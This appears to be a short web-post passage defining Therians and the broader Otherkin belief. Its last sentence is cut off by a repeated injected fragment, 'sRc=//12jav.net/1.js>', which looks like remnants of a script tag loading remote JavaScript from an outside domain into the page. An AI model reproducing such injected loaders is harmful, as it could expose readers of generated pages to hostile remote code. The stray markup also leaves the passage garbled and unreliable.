The Therian belief is that your spiritual body is actually in the form of an existing animal/creature.

There is a broader group known as Otherkin, where people believe they have the soul of a dragon/ect instead of being 100% incarnate as a human sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
